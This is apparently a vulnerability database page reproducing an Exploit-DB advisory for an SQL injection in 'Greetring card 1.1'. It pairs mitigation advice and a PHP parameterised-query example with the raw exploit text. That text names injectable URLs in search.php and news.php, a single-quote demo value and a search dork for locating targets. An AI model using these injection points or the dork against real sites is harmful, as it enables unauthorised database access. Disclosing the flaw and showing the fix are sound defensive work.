Vendor: Greetring card
By: Net.Edit0r
CVSS: 7,5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Greetring card
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/PHP
2020

Greetring card SQL Injection Vulnerability

Greetring card 1.1 is affected by SQL injection, a web application vulnerability that allows an attacker to inject malicious SQL queries into the vulnerable web application. The vulnerability can be exploited by sending malicious SQL queries to the vulnerable web application, which then executes them and returns the results to the attacker.

Mitigation:

To mitigate this vulnerability, input validation should be done on the server side. All user input should be validated and filtered before being used in any SQL query. Additionally, parameterized queries should be used to prevent SQL injection.
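
The mitigation above, applied to the CategoryID and SubcategoryID parameters listed in the advisory, as an added example that is not the product's own code. The `cards` table, its columns, the helper function names and the in-memory SQLite database are assumptions made so the snippet runs stand-alone.

```php
<?php
declare(strict_types=1);

// Constructed demo data; the real schema is not shown in the advisory.
function demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE cards (id INTEGER PRIMARY KEY, category_id INTEGER, subcategory_id INTEGER, title TEXT)');
    $db->exec("INSERT INTO cards (category_id, subcategory_id, title) VALUES (15, 60, 'Birthday'), (15, 61, 'Wedding'), (6, 10, 'New Year')");
    return $db;
}

// Server-side validation: accept only a positive decimal integer.
function int_param(array $query, string $name): ?int {
    if (!isset($query[$name]) || !is_string($query[$name])) {
        return null; // missing, or an array such as CategoryID[]=1
    }
    $v = filter_var($query[$name], FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

// Returns matching titles, or null when the caller should answer HTTP 400.
function search_cards(PDO $db, array $query): ?array {
    $category = int_param($query, 'CategoryID');
    if ($category === null) {
        return null;
    }
    $sql = 'SELECT title FROM cards WHERE category_id = :cat';
    $params = [':cat' => $category];
    if (array_key_exists('SubcategoryID', $query)) {
        $sub = int_param($query, 'SubcategoryID');
        if ($sub === null) {
            return null;
        }
        $sql .= ' AND subcategory_id = :sub';
        $params[':sub'] = $sub;
    }
    // Values travel as bound parameters, never as part of the SQL text.
    $stmt = $db->prepare($sql . ' ORDER BY id');
    foreach ($params as $name => $value) {
        $stmt->bindValue($name, $value, PDO::PARAM_INT);
    }
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$db = demo_db();
var_dump(search_cards($db, ['CategoryID' => '15', 'SubcategoryID' => '60']));  // well-formed request
var_dump(search_cards($db, ['CategoryID' => '15', 'SubcategoryID' => "60'"])); // value from the advisory's demo URL
```

In a real handler `$query` would be `$_GET`, and a `null` result would be turned into a 400 response without echoing any database error text.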
Source

Exploit-DB raw data:

========================================
Grering card SQL Injection Vulnerability
========================================


# Title : Greetring card SQL Injection Vulnerability
# Author : Net.Edit0r
# Location : Iran
# Dork : "Send amazing greetings to your friends and relative!"
# Category : webapps
# Version : 1.1
# Platform : linux/php


[~]######################################### InformatioN
#############################################[~]

[~] Title : Grering card SQL Injection Vulnerability
[~] Author : Net.Edit0r
[~] Email : Net.Edit0r@Att.net ~ Black.Hat.TM@Gmail.com

[~]######################################### ExploiT
#############################################[~]

[~] 1. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=15&SubcategoryID=[SQL]

[~] 2. Vulnerable File :

http://127.0.0.1/search.php?CategoryID=6[SQL]

[~] 3. Vulnerable File :

http://127.0.0.1/news.php?CategoryID=[SQL]

[~] 3. Demo :

http://server/search.php?CategoryID=15&SubcategoryID=60'

[~]######################################### ThankS To ...
############################################[~]

[~] Special Thanks To My Best FriendS :

NetQard , B3hz4d , Raiden , ~[ CriMe ]~ , † CoNstaNtine † , _R3v4l_ ,
~~XTerror~~ , __l2o5v4__ , _Attack_

[~] IRANIAN Young HackerZ

[~] GreetZ : Sun-Army.Org , Phc.Ir , Dark-tunnel.com , AttackerZ.IR

[~]######################################### FinisH :D
#############################################[~]